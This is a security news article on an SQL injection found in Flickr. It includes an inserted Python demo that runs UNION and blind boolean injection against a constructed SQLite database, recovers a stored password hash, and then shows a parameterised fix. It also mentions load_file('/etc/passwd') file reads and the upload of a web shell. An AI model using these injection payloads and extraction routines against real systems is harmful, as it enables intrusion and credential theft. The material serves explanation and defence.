Flickr vulnerable to SQL Injection and Remote Code Execution Flaws

Security researchers seem to be on a roll. Last week was a rough one for the internet: the Heartbleed vulnerability in OpenSSL was disclosed, putting a large share of the world's web servers at risk (reports at the time put the figure at around two-thirds), and shortly afterwards researchers from Detectify found a critical flaw (an XML External Entity injection) in a Google product that let them read the /etc/passwd and /etc/hosts files from a Google server.

Now another major site, the photo-sharing service Flickr (owned by Yahoo Inc.), has turned out to have a severe vulnerability. Security researcher Ibrahim Raafat from Egypt found an SQL injection vulnerability in the Flickr site.

Raafat reports that two parameters (page_id and items) were vulnerable to blind SQL injection and one (Order_id) to direct SQL injection. In the direct case the results of the injected query are echoed back in the page; in the blind case nothing is echoed and the attacker has to infer the data from true/false differences in the response, typically one bit at a time, which is slower but just as complete. Either way the flaw lets an attacker read the Flickr database, and a successful exploitation could also extract database and MySQL login credentials by injecting further SQL queries.
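To make the blind/direct distinction concrete, here is an added example (not code from the original article or from Raafat's report): a self-contained simulation of both injection classes against an in-memory SQLite database standing in for Flickr's MySQL backend. The `pages` and `db_users` tables, their contents and the `lookup_*` functions are all constructed for this demo; the payload shapes are the generic UNION and boolean-based forms, not the ones used against Flickr.

```python
import sqlite3


def build_db():
    """Constructed sample schema standing in for the real database (names assumed)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE pages(id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO pages VALUES (1, 'Home'), (2, 'Explore');
        CREATE TABLE db_users(user TEXT, password_hash TEXT);
        INSERT INTO db_users VALUES ('flickr_app', 's3cr3t');
    """)
    return con


def lookup_vulnerable(con, page_id):
    """Flawed pattern: the request parameter is pasted straight into the SQL text."""
    sql = "SELECT title FROM pages WHERE id = " + page_id
    return [row[0] for row in con.execute(sql).fetchall()]


def lookup_safe(con, page_id):
    """Hardened form: validate the type, then bind the value as a parameter."""
    try:
        value = int(page_id)
    except ValueError:
        return []
    rows = con.execute("SELECT title FROM pages WHERE id = ?", (value,)).fetchall()
    return [row[0] for row in rows]


def direct_injection(lookup):
    """Direct (UNION-based) injection: attacker-chosen rows appear in the normal output."""
    return lookup("0 UNION SELECT user || ':' || password_hash FROM db_users")


def blind_injection(lookup, max_len=32):
    """Boolean-based blind injection: nothing is echoed, so every bit of the target
    value becomes a yes/no question ("does page 1 still come back?")."""
    target = "(SELECT password_hash FROM db_users LIMIT 1)"
    recovered = ""
    for pos in range(1, max_len + 1):
        code = 0
        for bit in range(7):  # printable ASCII fits in 7 bits
            # unicode(substr(...)) is NULL past the end of the string; coalesce turns that into 0
            payload = (
                f"1 AND ((coalesce(unicode(substr({target}, {pos}, 1)), 0) >> {bit}) & 1)"
            )
            if lookup(payload):  # the row for page 1 is returned only when the bit is set
                code |= 1 << bit
        if code == 0:  # all bits zero: we have run off the end of the value
            break
        recovered += chr(code)
    return recovered


if __name__ == "__main__":
    con = build_db()
    print("direct, vulnerable:", direct_injection(lambda v: lookup_vulnerable(con, v)))
    print("direct, safe:      ", direct_injection(lambda v: lookup_safe(con, v)))
    print("blind, vulnerable: ", blind_injection(lambda v: lookup_vulnerable(con, v)))
    print("blind, safe:       ", repr(blind_injection(lambda v: lookup_safe(con, v))))
```

Against the concatenated query the UNION payload returns `flickr_app:s3cr3t` directly, and the blind routine recovers the same hash with 7 requests per character without ever seeing it in a response. Against the parameterised query both attacks return nothing, because the parameter is validated as an integer and bound as data rather than parsed as SQL; the query text never changes no matter what the client sends.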

Raafat further explains that the SQL injection on Flickr could be escalated toward remote code execution on the server: using the MySQL load_file("/etc/passwd") function he was able to read the contents of sensitive files on the Flickr server (screenshot in the original post). As a general point, load_file() and its write-side counterpart, SELECT ... INTO OUTFILE, only work when the database account holds the MySQL FILE privilege and secure_file_priv does not restrict the path, so an application connecting as an over-privileged database user is what turns a data-disclosure bug into file read and file write on the host.

Raafat also released a video demonstration showing that the vulnerability allowed him to write new files on the server, which let him upload a custom code-execution shell.
Tags: Bug Bounty, News, Security, Yahoo